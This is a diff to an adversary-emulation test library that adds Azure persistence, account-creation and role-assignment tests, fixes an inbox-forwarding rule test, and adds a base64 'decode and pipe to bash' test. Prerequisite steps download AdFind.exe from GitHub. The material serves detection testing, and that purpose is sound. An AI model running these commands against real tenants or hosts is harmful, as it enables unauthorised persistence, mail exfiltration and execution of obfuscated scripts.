   supported_platforms:
diff --git a/atomics/T1078.004/T1078.004.md b/atomics/T1078.004/T1078.004.md
index dd399cea..6628a3c4 100644
--- a/atomics/T1078.004/T1078.004.md
+++ b/atomics/T1078.004/T1078.004.md
@@ -10,6 +10,8 @@ Once a cloud account is compromised, an adversary may perform [Account Manipulat
 
 - [Atomic Test #1 - Creating GCP Service Account and Service Account Key](#atomic-test-1---creating-gcp-service-account-and-service-account-key)
 
+- [Atomic Test #2 - Azure Persistence Automation Runbook Created or Modified](#atomic-test-2---azure-persistence-automation-runbook-created-or-modified)
+
 
 <br/>
 
@@ -65,4 +67,58 @@ echo "Please Install Google Cloud SDK before running this atomic test : https://
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure Persistence Automation Runbook Created or Modified
+Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+Automation runbook to execute malicious code and maintain persistence in their target's environment.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure username | String | |
+| password | Azure password | String | |
+| resource_group | Name of the resource group | String | |
+| runbook_name | Name of the runbook name | String | |
+| automation_account_name | Name of the automation account name | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-AzAccount -Credential $creds
+New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Install-Module -Name Az
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Scope CurrentUser -Force
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1078.004/T1078.004.yaml b/atomics/T1078.004/T1078.004.yaml
index 8ec0c757..0ced90f0 100644
--- a/atomics/T1078.004/T1078.004.yaml
+++ b/atomics/T1078.004/T1078.004.yaml
@@ -6,7 +6,6 @@ atomic_tests:
   auto_generated_guid: 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e
   description: |
     GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.
-
   supported_platforms:
   - google-workspace
   - iaas:gcp
@@ -42,7 +41,6 @@ atomic_tests:
       gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
     cleanup_command: |
       gcloud iam service-accounts delete #{service-account-email} --quiet
-
   dependency_executor_name: sh
   dependencies:
   - description: |
@@ -51,3 +49,48 @@ atomic_tests:
       if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
       echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+- name: Azure Persistence Automation Runbook Created or Modified
+  auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+  description: |
+    Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+    Automation runbook to execute malicious code and maintain persistence in their target's environment.
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure username
+      type: String
+      default: null
+    password:
+      description: Azure password
+      type: String
+      default: null
+    resource_group:
+      description: Name of the resource group
+      type: String
+      default: null
+    runbook_name:
+      description: Name of the runbook name
+      type: String
+      default: null
+    automation_account_name:
+      description: Name of the automation account name
+      type: String
+      default: null
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Install-Module -Name Az
+    prereq_command: |
+      try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name Az -Scope CurrentUser -Force
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzAccount -Credential $creds
+      New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+      Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+    name: powershell
+    elevation_required: false
diff --git a/atomics/T1087.002/T1087.002.md b/atomics/T1087.002/T1087.002.md
index 1318837c..c040ce66 100644
--- a/atomics/T1087.002/T1087.002.md
+++ b/atomics/T1087.002/T1087.002.md
@@ -224,6 +224,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -270,6 +271,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -316,6 +318,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -362,6 +365,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -676,12 +680,6 @@ This is done remotely via wmic and captures the event code 4776 from the domain
 
 
 
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| Domain | Domain that is being tested against | string | $env:USERDOMAIN|
-| DomainController | Domain Controller that is being tested against | string | $env:UserDnsDomain|
-
 
 #### Attack Commands: Run with `powershell`! 
 
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index 280f34a3..d77a3228 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -86,6 +86,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -110,6 +111,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -134,6 +136,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -158,6 +161,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -316,15 +320,6 @@ atomic_tests:
     This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
   supported_platforms:
   - windows
-  input_arguments:
-    Domain:
-      description: Domain that is being tested against
-      type: string
-      default: $env:USERDOMAIN
-    DomainController:
-      description: Domain Controller that is being tested against
-      type: string
-      default: $env:UserDnsDomain
   executor:
     command: |-
       wmic /node:$env:UserDnsDomain process call create 'wevtutil epl Security C:\Temp\ntlmusers.evtx /q:Event[System[(EventID=4776)]]'
diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index 69d4f1e2..2a4b0457 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -237,7 +237,7 @@ Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure AD role | string | Global Reader|
 
 
@@ -250,7 +250,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential
 
-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -265,7 +265,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+$user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
 if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -400,7 +400,7 @@ Detection hint - check Operation Name "Create role assignment" in subscriptions
 |------|-------------|------|---------------|
 | username | Azure AD username | string | jonh@contoso.com|
 | password | Azure AD password | string | p4sswd|
-| user_principal_name | Name of the targeted user (user principal) | string | SuperUser|
+| user_principal_name | Display Name, or User Principal Name, of the targeted user principal | string | SuperUser|
 | role_name | Name of the targeted Azure role | string | Reader|
 | subscription | Name of the targeted subscription | string | Azure subscription 1|
 
@@ -414,7 +414,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential
 
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -432,7 +432,7 @@ $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
 $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
 Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
 if ($user -eq $null) { Write-Warning "User not found"; exit }
 $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
 if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index a4f6598d..1a832c77 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -151,7 +151,7 @@ atomic_tests:
       type: string
       default: p4sswd
     user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
       type: string
       default: SuperUser
     role_name:
@@ -172,7 +172,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzureAD -Credential $Credential
 
-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
       if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -184,7 +184,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzureAD -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+      $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
       if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -286,7 +286,7 @@ atomic_tests:
       type: string
       default: p4sswd
     user_principal_name:
-      description: Name of the targeted user (user principal)
+      description: Display Name, or User Principal Name, of the targeted user principal
       type: string
       default: SuperUser
     role_name:
@@ -311,7 +311,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzAccount -Credential $Credential
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
       if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -326,7 +326,7 @@ atomic_tests:
       $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
       Connect-AzAccount -Credential $Credential -ErrorAction Ignore
 
-      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
       if ($user -eq $null) { Write-Warning "User not found"; exit }
       $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
       if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 69e4bf3f..2afe3084 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -1764,7 +1764,7 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v Micr
 <br/>
 
 ## Atomic Test #48 - Event Viewer Registry Modification - Redirection Program
-Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in thed redirection program registry entry.
+Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
 
 **Supported Platforms:** Windows
 
diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 1298ee97..65cf5eb7 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -752,7 +752,7 @@ atomic_tests:
     elevation_required: true
 - name: Event Viewer Registry Modification - Redirection Program
   auto_generated_guid: 81483501-b8a5-4225-8b32-52128e2f69db
-  description: Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in thed redirection program registry entry.
+  description: Modify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.
   supported_platforms:
   - windows
   input_arguments:
diff --git a/atomics/T1114.003/T1114.003.md b/atomics/T1114.003/T1114.003.md
index 60147357..2ea0745d 100644
--- a/atomics/T1114.003/T1114.003.md
+++ b/atomics/T1114.003/T1114.003.md
@@ -39,7 +39,7 @@ Creates a new Inbox Rule to forward emails to an external user via the "ForwardT
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
-New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
 ```
 
 #### Cleanup Commands:
diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml
index bcfb52de..3037d5c8 100644
--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -40,7 +40,7 @@ atomic_tests:
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+      New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
     cleanup_command: |
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
diff --git a/atomics/T1136.003/T1136.003.md b/atomics/T1136.003/T1136.003.md
index b47159da..26d27488 100644
--- a/atomics/T1136.003/T1136.003.md
+++ b/atomics/T1136.003/T1136.003.md
@@ -8,6 +8,10 @@ Adversaries may create accounts that only have access to specific cloud services
 
 - [Atomic Test #1 - AWS - Create a new IAM user](#atomic-test-1---aws---create-a-new-iam-user)
 
+- [Atomic Test #2 - Azure AD - Create a new user](#atomic-test-2---azure-ad---create-a-new-user)
+
+- [Atomic Test #3 - Azure AD - Create a new user via Azure CLI](#atomic-test-3---azure-ad---create-a-new-user-via-azure-cli)
+
 
 <br/>
 
@@ -57,4 +61,144 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure AD - Create a new user
+Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** e62d23ef-3153-4837-8625-fa4a3829134d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Display name of the new user to be created in Azure AD | string | atomicredteam|
+| userprincipalname | User principal name (UPN) for the new Azure user being created format email address | String | atomicredteam@yourdomain.com|
+| password | Password for the new Azure AD user being created | string | reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Connect-AzureAD
+$userprincipalname = "#{userprincipalname}"
+$username = "#{username}"      
+$password = "#{password}"
+$PasswordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile
+$PasswordProfile.Password = $password
+New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-AzureADUser -ObjectId "#{userprincipalname}"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if AzureAD PowerShell module is installed
+##### Check Prereq Commands:
+```powershell
+Get-InstalledModule -Name AzureAD
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
+```
+##### Description: Check if AzureAD PowerShell module is installed
+##### Check Prereq Commands:
+```powershell
+Update the input arguments so the userprincipalname value is accurate for your environment
+```
+##### Get Prereq Commands:
+```powershell
+echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - Azure AD - Create a new user via Azure CLI
+Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 228c7498-be31-48e9-83b7-9cb906504ec8
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Display name of the new user to be created in Azure AD | string | atomicredteam|
+| userprincipalname | User principal name (UPN) for the new Azure user being created format email address | String | atomicredteam@yourdomain.com|
+| password | Password for the new Azure AD user being created | string | reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+az login
+$userprincipalname = "#{userprincipalname}"
+$username = "#{username}"      
+$password = "#{password}"
+az ad user create --display-name $username --password $password --user-principal-name $userprincipalname
+az ad user list --filter "displayname eq 'atomicredteam'"
+```
+
+#### Cleanup Commands:
+```powershell
+az ad user delete --id
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Check if Azure CLI is installed and install manually
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+```
+##### Description: Check if Azure CLI is installed and install via PowerShell
+##### Check Prereq Commands:
+```powershell
+az account list
+```
+##### Get Prereq Commands:
+```powershell
+echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+```
+##### Description: Update the userprincipalname to meet your requirements
+##### Check Prereq Commands:
+```powershell
+Update the input arguments so the userprincipalname value is accurate for your environment
+```
+##### Get Prereq Commands:
+```powershell
+echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+```
+
+
+
+
 <br/>
diff --git a/atomics/T1136.003/T1136.003.yaml b/atomics/T1136.003/T1136.003.yaml
index 8c1ecee0..8533b4d7 100644
--- a/atomics/T1136.003/T1136.003.yaml
+++ b/atomics/T1136.003/T1136.003.yaml
@@ -26,3 +26,79 @@ atomic_tests:
       aws iam delete-user --user-name #{username}
     name: sh
     elevation_required: false
+- name: Azure AD - Create a new user
+  auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
+  description: Creates a new user in Azure AD. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Display name of the new user to be created in Azure AD
+      type: string
+      default: "atomicredteam"
+    userprincipalname:
+      description: User principal name (UPN) for the new Azure user being created format email address
+      type: String
+      default: "atomicredteam@yourdomain.com"
+    password:
+      description: Password for the new Azure AD user being created
+      type: string
+      default: "reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Check if AzureAD PowerShell module is installed
+    prereq_command: Get-InstalledModule -Name AzureAD
+    get_prereq_command: echo "use the following to install AzureAD PowerShell module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery -Force"
+  - description: Check if AzureAD PowerShell module is installed
+    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
+    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+  executor:
+    command: |-
+      Connect-AzureAD
+      $userprincipalname = "#{userprincipalname}"
+      $username = "#{username}"      
+      $password = "#{password}"
+      $PasswordProfile = New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile
+      $PasswordProfile.Password = $password
+      New-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName $username      
+    cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
+    name: powershell
+- name: Azure AD - Create a new user via Azure CLI
+  auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+  description: Creates a new user in Azure AD via the Azure CLI. Upon successful creation, a new user will be created. Adversaries create new users so that their malicious activity does not interrupt the normal functions of the compromised users and can remain undetected for a long time.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Display name of the new user to be created in Azure AD
+      type: string
+      default: "atomicredteam"
+    userprincipalname:
+      description: User principal name (UPN) for the new Azure user being created format email address
+      type: String
+      default: "atomicredteam@yourdomain.com"
+    password:
+      description: Password for the new Azure AD user being created
+      type: string
+      default: "reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: Check if Azure CLI is installed and install manually
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI manually https://aka.ms/installazurecliwindows"
+  - description: Check if Azure CLI is installed and install via PowerShell
+    prereq_command: az account list
+    get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+  - description: Update the userprincipalname to meet your requirements  
+    prereq_command: Update the input arguments so the userprincipalname value is accurate for your environment
+    get_prereq_command: echo "Update the input arguments in the .yaml file so that the userprincipalname value is accurate for your environment"
+  executor:
+    command: |-
+      az login
+      $userprincipalname = "#{userprincipalname}"
+      $username = "#{username}"      
+      $password = "#{password}"
+      az ad user create --display-name $username --password $password --user-principal-name $userprincipalname
+      az ad user list --filter "displayname eq 'atomicredteam'"     
+    cleanup_command: az ad user delete --id #{userprincipalname}
+    name: powershell
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index a39b46d0..01ac9628 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -20,6 +20,8 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp
 
 - [Atomic Test #6 - Hex decoding with shell utilities](#atomic-test-6---hex-decoding-with-shell-utilities)
 
+- [Atomic Test #7 - Linux Base64 Encoded Shebang in CLI](#atomic-test-7---linux-base64-encoded-shebang-in-cli)
+
 
 <br/>
 
@@ -297,4 +299,55 @@ echo "Please install xxd"
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #7 - Linux Base64 Encoded Shebang in CLI
+Using Linux Base64 Encoded shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it.
+
+**Supported Platforms:** Linux, macOS
+
+
+**auto_generated_guid:** 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| bash_encoded | Encoded | string | IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
+| dash_encoded | Encoded | string | IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
+| fish_encoded | Encoded | string | IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=|
+| sh_encoded | Encoded | string | IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+echo #{bash_encoded} | base64 -d | bash
+echo #{dash_encoded} | base64 -d | bash
+echo #{fish_encoded} | base64 -d | bash
